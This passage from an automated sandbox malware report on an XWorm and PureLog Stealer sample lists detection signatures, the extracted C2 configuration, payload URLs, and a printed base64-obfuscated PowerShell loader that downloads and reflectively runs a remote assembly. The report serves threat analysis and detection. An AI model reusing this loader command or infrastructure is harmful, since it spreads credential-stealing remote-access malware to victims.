Windows Analysis Report
TM3utH2CsU.exe

Overview

General Information

Sample name: TM3utH2CsU.exe
renamed because original name is a hash value
Original sample name: 3658f44acb4d331fa89ab43d782bee2a97a48b2f425cad29939ee472c74bc62f.exe
Analysis ID: 1518119
MD5: 2b39077634e7172489d66ed8e66ae63a
SHA1: 600467d0e3eadb245e451930dee698d1fc37ca23
SHA256: 3658f44acb4d331fa89ab43d782bee2a97a48b2f425cad29939ee472c74bc62f
Tags: exeGuangdongKenuosiIoTNetworkTechnologyCoLtduser-JAMESWT_MHT
Infos:

Detection

PureLog Stealer, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected PureLog Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops VBS files to the startup folder
Drops script or batch files to the startup folder
Found suspicious ZIP file
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000071.00000002.2463346324.00000237B3BB2000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["135.224.23.113"], "Port": "5555", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.2% probability
Sample uses string decryption to hide its real strings
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack String decryptor: 135.224.23.113
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack String decryptor: 5555
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack String decryptor: <123456789>
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack String decryptor: <Xwormmm>
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack String decryptor: XWorm V5.6
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack String decryptor: USB.exe
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A60F30 DecryptMessage,DecryptMessage,ApplyControlToken, 0_2_00007FF681A60F30
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A5E090 EncryptMessage, 0_2_00007FF681A5E090
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A5DDD0 EncryptMessage, 0_2_00007FF681A5DDD0
Source: TM3utH2CsU.exe Static PE information: certificate valid
Source: TM3utH2CsU.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: e.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.1650115871.000001AF16FEA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1704147920.000001EC82CEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbh{o source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000012.00000002.2410995855.000001AF310FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\System.Core.pdbDc source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdbEX source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2327989343.000001AF30E70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000001E.00000002.1704147920.000001EC82C8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combine.pdb source: TM3utH2CsU.exe, 00000000.00000002.1745075290.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp, TM3utH2CsU.exe, 00000000.00000000.1351636173.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000012.00000002.1728472486.000001AF29D0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2481504661.000001AF314E0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000012.00000002.2327989343.000001AF30E70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\System.Core.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000012.00000002.2455008482.000001AF31187000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdll source: powershell.exe, 00000012.00000002.2327989343.000001AF30EBF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B09F70 CloseHandle,FindFirstFileW,FindClose, 0_2_00007FF681B09F70
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 135.224.23.113
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.47.168.24 23.47.168.24
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217016A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC8612E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ia600100.us.archive.org
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1728472486.000001AF28D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021701963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://paste.ee
Source: powershell.exe, 0000001E.00000002.1718239578.000001EC8638E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000010.00000002.3144999713.000001C515986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1650971505.000001AF18CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84A94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A3E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217016EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC86176000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001E.00000002.1718239578.000001EC8638E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001E.00000002.1704147920.000001EC82C09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000010.00000002.3144999713.000001C51593D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000010.00000002.3144999713.000001C515959000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1650971505.000001AF18CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84A94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 0000001E.00000002.1718239578.000001EC8638E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000012.00000002.1650971505.000001AF19678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.000002170118C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC8540B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A393000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600100.us.arX
Source: powershell.exe, 00000018.00000002.1667045038.000002170169D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600100.us.arXj
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1650971505.000001AF18F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.000002170169D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC860A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600100.us.archive.org
Source: powershell.exe, 0000001E.00000002.1718239578.000001EC84CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Source: powershell.exe, 00000012.00000002.1650971505.000001AF18F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtZHo;NrXbase64Content
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1728472486.000001AF28D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021701963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A3E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217016EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC86176000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1A3E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217016EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC86176000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000012.00000002.1650971505.000001AF1912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84E93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/82O7E/0
Source: TM3utH2CsU.exe, 00000000.00000003.1379876457.000002069462F000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000002.1730832059.00000206945BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.pro/nd/eneba_com_privacy_policy.pdf
Source: TM3utH2CsU.exe, 00000000.00000000.1351636173.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://rdoge.pro/nd/eneba_com_privacy_policy.pdfFailed
Source: TM3utH2CsU.exe, 00000000.00000002.1730832059.00000206945BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.pro/nd/eneba_com_privacy_policy.pdfO
Source: TM3utH2CsU.exe, 00000000.00000003.1407187350.000002069462F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.pro/stc/pure_hnvc1.zip
Source: TM3utH2CsU.exe, 00000000.00000003.1407187350.000002069462F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.pro/stc/pure_hnvc1.zipf4
Source: TM3utH2CsU.exe, 00000000.00000002.1745075290.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp, TM3utH2CsU.exe, 00000000.00000000.1351636173.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://rdoge.pro/stc/pure_hnvc1.ziphttps://rdoge.pro/stc/wm_startup.ziphttps://rdoge.pro/stc/pure_h
Source: TM3utH2CsU.exe, 00000000.00000003.1407187350.000002069462F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.pro/stc/pure_hnvc1.zipo4
Source: TM3utH2CsU.exe, 00000000.00000003.1466683610.000002069462F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.pro/stc/pure_hnvc2.zip
Source: TM3utH2CsU.exe, 00000000.00000003.1466683610.000002069462F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.pro/stc/pure_hnvc2.zip049p
Source: TM3utH2CsU.exe, 00000000.00000003.1436659897.000002069462F000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000003.1466683610.000002069462F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.pro/stc/wm_startup.zip
Source: TM3utH2CsU.exe, 00000000.00000003.1436659897.000002069462F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.pro/stc/wm_startup.zipf4
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Too many similar processes found
Source: powershell.exe Process created: 70

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 125.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 113.2.powershell.exe.237b3bb2660.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000007D.00000002.2600075638.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000071.00000002.2463346324.00000237B3BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3768, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6320, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8200, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
.NET source code contains very large array initializations
Source: 18.2.powershell.exe.1af2a0cd0e8.1.raw.unpack, State.cs Large array initialization: SearchFactory: array initializer size 294288
Found suspicious ZIP file
Source: sys.zip.0.dr Zip Entry: hnvc.vbs
Source: sys.zip.0.dr Zip Entry: pure_hnvc.bat
Source: pow.zip.0.dr Zip Entry: wm.vbs
Source: pow.zip.0.dr Zip Entry: wm_startup.bat
Source: 32.zip.0.dr Zip Entry: hnvc.vbs
Source: 32.zip.0.dr Zip Entry: pure_hnvc.bat
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 